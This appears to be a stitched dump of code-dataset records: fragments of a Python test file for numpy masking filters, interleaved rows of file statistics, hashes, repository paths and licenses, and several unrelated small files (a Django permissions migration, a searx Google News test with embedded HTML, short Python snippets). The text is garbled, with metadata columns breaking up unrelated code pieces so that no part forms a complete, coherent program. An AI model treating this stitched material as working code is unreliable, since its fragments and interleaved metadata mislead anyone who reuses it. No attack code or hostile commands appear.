filter is checked. CHECK_STRING = '46.4998252465517387337527237516559582272076600' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. 
As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. return None def test_filter_minimum_value(): """ This tests the filtering of values below a minimum.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(7,7)) # Prescribed filtering parameters. # The value 101 itself should not be masked. minimum_value = 101 # Create the filter. test_filter = mask.filter_minimum_value(data_array=test_array, minimum_value=minimum_value) # Create a filter array for both convince and testing. test_filtered_array = np_ma.array(test_array, mask=test_filter, dtype=int) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '52.5579255086291590806495158287835916351211866' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. 
return None def test_filter_exact_value(): """ This tests the filtering of exact values.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(7,7)) # Prescribed filtering parameters exact_value = 101 # Create the filter. test_filter = mask.filter_exact_value(data_array=test_array, exact_value=exact_value) # Create a filtered array for both convince and testing. test_filtered_array = np_ma.array(test_array, mask=test_filter, dtype=int) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '86.9163820638011874618505104537286754939523446' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. return None def test_filter_invalid_value(): """ This tests the filtering of invalid values.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(7,7)) # We need to force invalid values as the prime test creation # does not have them. test_array = np.array(test_array,dtype=float) test_array[1:3,2] = np.inf test_array[2,4:6] = -np.inf test_array[5,1:6] = np.nan # Prescribed filtering parameters pass # Create the filter. test_filter = mask.filter_invalid_value(data_array=test_array) # Create a filtered array for both convince and testing. 
test_filtered_array = np_ma.array(test_array, mask=test_filter) print(test_filtered_array) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '70.8884174145533646297736729939104459590381610' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. return None
43.68662
78
0.682679
1,583
12,407
5.149716
0.116867
0.047473
0.037782
0.037782
0.805201
0.791094
0.765088
0.73528
0.73528
0.72473
0
0.045694
0.250343
12,407
283
79
43.840989
0.830771
0.357782
0
0.59854
0
0
0.128769
0.041134
0
0
0
0
0.10219
1
0.051095
false
0.007299
0.058394
0
0.160584
0.007299
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
46b81ea07da63066f9d258dbea466680c469be8c
124
py
Python
netsquid_executor/src/__init__.py
qis-unipr/dqc-executor
842f907830f557e506793553338eecf669e5ed32
[ "Apache-2.0" ]
null
null
null
netsquid_executor/src/__init__.py
qis-unipr/dqc-executor
842f907830f557e506793553338eecf669e5ed32
[ "Apache-2.0" ]
null
null
null
netsquid_executor/src/__init__.py
qis-unipr/dqc-executor
842f907830f557e506793553338eecf669e5ed32
[ "Apache-2.0" ]
1
2021-08-05T13:30:53.000Z
2021-08-05T13:30:53.000Z
import os import sys from .network import * sys.path.append(os.path.join(os.path.dirname(__file__), '../../dqc-circuit'))
17.714286
77
0.709677
19
124
4.421053
0.631579
0.214286
0
0
0
0
0
0
0
0
0
0
0.096774
124
6
78
20.666667
0.75
0
0
0
0
0
0.137097
0
0
0
0
0
0
1
0
true
0
0.75
0
0.75
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
46bc1f403cedc6023a0b25ab9b1e9661581190c2
161
py
Python
ex47_bc/tests/test_language.py
techieguy007/learn-more-python-the-hard-way-solutions
7886c860f69d69739a41d6490b8dc3fa777f227b
[ "Zed", "Unlicense" ]
466
2016-11-01T19:40:59.000Z
2022-03-23T16:34:13.000Z
ex47_bc/tests/test_language.py
Desperaaado/learn-more-python-the-hard-way-solutions
7886c860f69d69739a41d6490b8dc3fa777f227b
[ "Zed", "Unlicense" ]
2
2017-09-20T09:01:53.000Z
2017-09-21T15:03:56.000Z
ex47_bc/tests/test_language.py
Desperaaado/learn-more-python-the-hard-way-solutions
7886c860f69d69739a41d6490b8dc3fa777f227b
[ "Zed", "Unlicense" ]
241
2017-06-17T08:02:26.000Z
2022-03-30T09:09:39.000Z
from calc.run import run def test_simple_function(): run(open("test1.calc").readlines()) def test_simple_script(): run(open("test2.calc").readlines())
20.125
39
0.708075
23
161
4.782609
0.565217
0.127273
0.236364
0
0
0
0
0
0
0
0
0.014184
0.124224
161
7
40
23
0.765957
0
0
0
0
0
0.124224
0
0
0
0
0
0
1
0.4
true
0
0.2
0
0.6
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
0
1
0
0
6
20224c44d1636245b5d3e65fc4cfe887eb1054bd
91
py
Python
getnet/services/payments/__init__.py
7bruno/getnet-py
590db2f19e0c7f98ffdfbb27f4c6ffd7fb1f47ed
[ "MIT" ]
2
2021-04-09T20:17:41.000Z
2021-04-09T20:18:06.000Z
getnet/services/payments/__init__.py
7bruno/getnet-py
590db2f19e0c7f98ffdfbb27f4c6ffd7fb1f47ed
[ "MIT" ]
null
null
null
getnet/services/payments/__init__.py
7bruno/getnet-py
590db2f19e0c7f98ffdfbb27f4c6ffd7fb1f47ed
[ "MIT" ]
null
null
null
from .order import Order from .customer import Customer from .order_items import OrderItem
22.75
34
0.835165
13
91
5.769231
0.461538
0.24
0
0
0
0
0
0
0
0
0
0
0.131868
91
3
35
30.333333
0.949367
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
203d8d3640d5f61cc6184a7f7fcd72ee159a148a
81
py
Python
lab-1/tempCodeRunnerFile.py
HITOfficial/python-laboratories
ae727563c95d1a5d5921566a3267594139d377bd
[ "MIT" ]
null
null
null
lab-1/tempCodeRunnerFile.py
HITOfficial/python-laboratories
ae727563c95d1a5d5921566a3267594139d377bd
[ "MIT" ]
null
null
null
lab-1/tempCodeRunnerFile.py
HITOfficial/python-laboratories
ae727563c95d1a5d5921566a3267594139d377bd
[ "MIT" ]
null
null
null
# print(check_expr("01>")) # print(check_expr("10>")) # print(check_expr("11>"))
20.25
26
0.62963
12
81
4
0.5
0.625
0.875
0
0
0
0
0
0
0
0
0.08
0.074074
81
4
27
20.25
0.56
0.91358
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
64466165c213dfc2a84ac0ba65fde11639e42804
2,907
py
Python
mapss/static/packages/arches/arches/app/models/migrations/4679_resource_editor_permissions.py
MPI-MAPSS/MAPSS
3a5c0109758801717aaa8de1125ca5e98f83d3b4
[ "CC0-1.0" ]
null
null
null
mapss/static/packages/arches/arches/app/models/migrations/4679_resource_editor_permissions.py
MPI-MAPSS/MAPSS
3a5c0109758801717aaa8de1125ca5e98f83d3b4
[ "CC0-1.0" ]
null
null
null
mapss/static/packages/arches/arches/app/models/migrations/4679_resource_editor_permissions.py
MPI-MAPSS/MAPSS
3a5c0109758801717aaa8de1125ca5e98f83d3b4
[ "CC0-1.0" ]
null
null
null
# -*- coding: utf-8 -*- # Generated by Django 1.9.2 on 2017-04-25 11:36 import os import uuid import django.db.models.deletion import django.contrib.postgres.fields.jsonb from django.db import migrations, models from django.core import management from arches.app.models.system_settings import settings def add_permissions(apps, schema_editor, with_create_permissions=True): db_alias = schema_editor.connection.alias Group = apps.get_model("auth", "Group") Permission = apps.get_model("auth", "Permission") write_nodegroup = Permission.objects.get(codename='write_nodegroup', content_type__app_label='models', content_type__model='nodegroup') delete_nodegroup = Permission.objects.get(codename='delete_nodegroup', content_type__app_label='models', content_type__model='nodegroup') resource_editor_group = Group.objects.using(db_alias).get(name='Resource Editor') resource_editor_group.permissions.add(write_nodegroup) resource_editor_group.permissions.add(delete_nodegroup) resource_editor_group = Group.objects.using(db_alias).get(name='Resource Reviewer') resource_editor_group.permissions.add(write_nodegroup) resource_editor_group.permissions.add(delete_nodegroup) resource_editor_group = Group.objects.using(db_alias).get(name='Crowdsource Editor') resource_editor_group.permissions.add(write_nodegroup) resource_editor_group.permissions.add(delete_nodegroup) def remove_permissions(apps, schema_editor, with_create_permissions=True): db_alias = schema_editor.connection.alias Group = apps.get_model("auth", "Group") Permission = apps.get_model("auth", "Permission") write_nodegroup = Permission.objects.get(codename='write_nodegroup', content_type__app_label='models', content_type__model='nodegroup') delete_nodegroup = Permission.objects.get(codename='delete_nodegroup', content_type__app_label='models', content_type__model='nodegroup') resource_editor_group = Group.objects.using(db_alias).get(name='Resource Editor') resource_editor_group.permissions.remove(write_nodegroup) 
resource_editor_group.permissions.remove(delete_nodegroup) resource_editor_group = Group.objects.using(db_alias).get(name='Resource Reviewer') resource_editor_group.permissions.remove(write_nodegroup) resource_editor_group.permissions.remove(delete_nodegroup) resource_editor_group = Group.objects.using(db_alias).get(name='Crowdsource Editor') resource_editor_group.permissions.remove(write_nodegroup) resource_editor_group.permissions.remove(delete_nodegroup) class Migration(migrations.Migration): dependencies = [ ('models', '4384_adds_rerender_widget_config'), ] operations = [ ## the following command has to be run after the previous RunSQL commands that update the domain datatype values migrations.RunPython(add_permissions,remove_permissions), ]
46.887097
141
0.79257
365
2,907
6.00274
0.243836
0.127796
0.156093
0.153355
0.77864
0.77864
0.77864
0.77864
0.77864
0.77864
0
0.007725
0.109391
2,907
61
142
47.655738
0.838548
0.060888
0
0.636364
1
0
0.112294
0.011743
0
0
0
0
0
1
0.045455
false
0
0.159091
0
0.272727
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
644b944e0d13595ffcbbae8fec0a3e61ba471ec9
34
py
Python
crabs/options.py
tor4z/crabs
7d525ebe8a0791a82635fad744ec5c92adc19cf0
[ "MIT" ]
null
null
null
crabs/options.py
tor4z/crabs
7d525ebe8a0791a82635fad744ec5c92adc19cf0
[ "MIT" ]
4
2021-01-07T22:41:11.000Z
2021-06-01T22:10:14.000Z
crabs/options.py
tor4z/crabs
7d525ebe8a0791a82635fad744ec5c92adc19cf0
[ "MIT" ]
null
null
null
from .http_client.options import *
34
34
0.823529
5
34
5.4
1
0
0
0
0
0
0
0
0
0
0
0
0.088235
34
1
34
34
0.870968
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
6454dde4728a4809c9dc82544950d5d84329e67c
7,393
py
Python
Toolkits/Discovery/meta/searx/tests/unit/engines/test_google_news.py
roscopecoltran/SniperKit-Core
4600dffe1cddff438b948b6c22f586d052971e04
[ "MIT" ]
null
null
null
Toolkits/Discovery/meta/searx/tests/unit/engines/test_google_news.py
roscopecoltran/SniperKit-Core
4600dffe1cddff438b948b6c22f586d052971e04
[ "MIT" ]
null
null
null
Toolkits/Discovery/meta/searx/tests/unit/engines/test_google_news.py
roscopecoltran/SniperKit-Core
4600dffe1cddff438b948b6c22f586d052971e04
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from collections import defaultdict import mock from searx.engines import google_news from searx.testing import SearxTestCase class TestGoogleNewsEngine(SearxTestCase): def test_request(self): query = 'test_query' dicto = defaultdict(dict) dicto['pageno'] = 1 dicto['language'] = 'fr_FR' dicto['time_range'] = 'w' params = google_news.request(query, dicto) self.assertIn('url', params) self.assertIn(query, params['url']) self.assertIn('fr', params['url']) dicto['language'] = 'all' params = google_news.request(query, dicto) self.assertIn('url', params) self.assertNotIn('fr', params['url']) def test_response(self): self.assertRaises(AttributeError, google_news.response, None) self.assertRaises(AttributeError, google_news.response, []) self.assertRaises(AttributeError, google_news.response, '') self.assertRaises(AttributeError, google_news.response, '[]') response = mock.Mock(text='{}') self.assertEqual(google_news.response(response), []) response = mock.Mock(text='{"data": []}') self.assertEqual(google_news.response(response), []) html = u""" <div class="g"> <div class="ts _V6c _Zmc _XO _knc _d7c"><a class="top _vQb _mnc" href="http://this.is.the.url" onmousedown="return rwt(this,'','','','5','AFQjCNGixEtJGC3qTB9pYFLXlRj8XXwdiA','','0ahUKEwiG7O_M5-rQAhWDtRoKHd0RD5QQvIgBCCwwBA','','',event)"><img class="th _lub" id="news-thumbnail-image-52779299683347" 
src="data:image/jpeg;base64,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" alt="A(z) south témájának képe a következőből: CBC.ca" data-deferred="1" onload="google.aft&amp;&amp;google.aft(this)"></a><div class="_cnc"><h3 class="r _U6c"><a class="l _HId" href="http://this.is.the.url" onmousedown="return rwt(this,'','','','5','AFQjCNGixEtJGC3qTB9pYFLXlRj8XXwdiA','','0ahUKEwiG7O_M5-rQAhWDtRoKHd0RD5QQqQIILSgAMAQ','','',event)">Meet Thuli Madonsela — <em>South</em> Africa's conscience</a></h3><div class="slp"><span class="_tQb _IId">CBC.ca</span><span class="_v5">-</span><span class="f nsa _uQb">9 órával ezelőtt</span></div><div class="st"><em>South</em> African Public Protector</div></div><div class="_Xmc card-section"><a class="_sQb" href="http://www.news24.com/Columnists/Mpumelelo_Mkhabela/who-really-governs-south-africa-20161209" onmousedown="return rwt(this,'','','','5','AFQjCNHhc2MnYSZ5T4COqInzvgoju5k5bA','','0ahUKEwiG7O_M5-rQAhWDtRoKHd0RD5QQuogBCC4oATAE','','',event)">Who really governs <em>South</em> Africa?</a><br><span class="_Wmc _GId">Vélemény</span><span class="_v5">-</span><span class="_tQb _IId">News24</span><span class="_v5">-</span><span class="f nsa _uQb">2016. dec. 8.</span></div><div class="_Vmc"></div></div> </div> """ # noqa response = mock.Mock(text=html) results = google_news.response(response) self.assertEqual(type(results), list) self.assertEqual(len(results), 1) self.assertEqual(results[0]['title'], u'Meet Thuli Madonsela \u2014 South Africa\'s conscience') self.assertEqual(results[0]['url'], 'http://this.is.the.url') self.assertEqual(results[0]['content'], 'South African Public Protector')
144.960784
5,644
0.843906
499
7,393
12.416834
0.492986
0.016139
0.020336
0.023241
0.12153
0.108457
0.087476
0.082957
0.082957
0.082957
0
0.102852
0.061004
7,393
50
5,645
147.86
0.789542
0.003517
0
0.15
0
0.025
0.797257
0.668387
0
1
0
0
0.4
1
0.05
false
0
0.1
0
0.175
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
6
648696ea1dd02801d739e6e534a41a0641b1a7c6
48
py
Python
super_taxi/controllers/registration.py
sanjayatb/taxi-booking-system
b78f8ab00a7f6d12c786331880242ce0306480bb
[ "MIT" ]
null
null
null
super_taxi/controllers/registration.py
sanjayatb/taxi-booking-system
b78f8ab00a7f6d12c786331880242ce0306480bb
[ "MIT" ]
null
null
null
super_taxi/controllers/registration.py
sanjayatb/taxi-booking-system
b78f8ab00a7f6d12c786331880242ce0306480bb
[ "MIT" ]
1
2021-09-17T18:23:13.000Z
2021-09-17T18:23:13.000Z
"Registation controller implementaion goes here"
48
48
0.875
5
48
8.4
1
0
0
0
0
0
0
0
0
0
0
0
0.083333
48
1
48
48
0.954545
0.958333
0
0
0
0
0.938776
0
0
0
0
0
0
1
0
true
0
0
0
0
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
0
0
0
1
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
64c2c94603cdbaefe677a154621a4b1aae942632
798
py
Python
2421.py
ErFer7/URI-Python
94c36985852204e34806650e4ffec48d4d9e9ab1
[ "MIT" ]
1
2022-02-06T19:36:33.000Z
2022-02-06T19:36:33.000Z
2421.py
ErFer7/URI-Python
94c36985852204e34806650e4ffec48d4d9e9ab1
[ "MIT" ]
null
null
null
2421.py
ErFer7/URI-Python
94c36985852204e34806650e4ffec48d4d9e9ab1
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- xy = list(map(int, input().split())) lh0 = list(map(int, input().split())) lh1 = list(map(int, input().split())) if lh0[1] + lh1[1] <= xy[1] and max(lh0[0], lh1[0]) <= xy[0]: print("S") elif lh0[0] + lh1[1] <= xy[1] and max(lh0[1], lh1[0]) <= xy[0]: print("S") elif lh0[1] + lh1[0] <= xy[1] and max(lh0[0], lh1[1]) <= xy[0]: print("S") elif lh0[0] + lh1[0] <= xy[1] and max(lh0[1], lh1[1]) <= xy[0]: print("S") elif lh0[0] + lh1[0] <= xy[0] and max(lh0[1], lh1[1]) <= xy[1]: print("S") elif lh0[0] + lh1[1] <= xy[0] and max(lh0[1], lh1[0]) <= xy[1]: print("S") elif lh0[1] + lh1[0] <= xy[0] and max(lh0[0], lh1[1]) <= xy[1]: print("S") elif lh0[1] + lh1[1] <= xy[0] and max(lh0[0], lh1[0]) <= xy[1]: print("S") else: print("N")
24.181818
63
0.488722
160
798
2.4375
0.13125
0.082051
0.14359
0.233333
0.923077
0.769231
0.741026
0.466667
0.138462
0.138462
0
0.130298
0.201754
798
33
64
24.181818
0.481947
0.026316
0
0.380952
0
0
0.011598
0
0
0
0
0
0
1
0
false
0
0
0
0
0.428571
0
0
0
null
0
0
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
6
b37e7e6a89913cc627e09496f52ed5a1a3d32964
77
py
Python
ttools/modules/__init__.py
IlyaBizyaev/ttools
b1435b19f397ce1baff9daed3cb287e52a029fdb
[ "MIT" ]
11
2018-11-15T05:33:35.000Z
2022-01-11T16:18:35.000Z
ttools/modules/__init__.py
IlyaBizyaev/ttools
b1435b19f397ce1baff9daed3cb287e52a029fdb
[ "MIT" ]
2
2019-10-02T16:20:31.000Z
2021-06-28T06:57:17.000Z
ttools/modules/__init__.py
IlyaBizyaev/ttools
b1435b19f397ce1baff9daed3cb287e52a029fdb
[ "MIT" ]
6
2019-06-28T00:07:24.000Z
2021-08-22T15:51:07.000Z
from .networks import * from .image_operators import * from .losses import *
19.25
30
0.766234
10
77
5.8
0.6
0.344828
0
0
0
0
0
0
0
0
0
0
0.155844
77
3
31
25.666667
0.892308
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
374c8ab766a49cd3f6988ec8679ae3c5ef1576ae
38
py
Python
tests/python-reference/lists/test_list_assign.py
jpolitz/lambda-py-paper
746ef63fc1123714b4adaf78119028afbea7bd76
[ "Apache-2.0" ]
25
2015-04-16T04:31:49.000Z
2022-03-10T15:53:28.000Z
tests/python-reference/lists/test_list_assign.py
jpolitz/lambda-py-paper
746ef63fc1123714b4adaf78119028afbea7bd76
[ "Apache-2.0" ]
1
2018-11-21T22:40:02.000Z
2018-11-26T17:53:11.000Z
tests/python-reference/lists/test_list_assign.py
jpolitz/lambda-py-paper
746ef63fc1123714b4adaf78119028afbea7bd76
[ "Apache-2.0" ]
1
2021-03-26T03:36:19.000Z
2021-03-26T03:36:19.000Z
l = [1,2] l[0] = 4 assert(l == [4,2])
9.5
18
0.394737
10
38
1.5
0.6
0
0
0
0
0
0
0
0
0
0
0.206897
0.236842
38
3
19
12.666667
0.310345
0
0
0
0
0
0
0
0
0
0
0
0.333333
1
0
false
0
0
0
0
0
1
1
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
375cc5649fcefb26d518c5b7395cb92b88dafb52
76
py
Python
py_tdlib/constructors/request_password_recovery.py
Mr-TelegramBot/python-tdlib
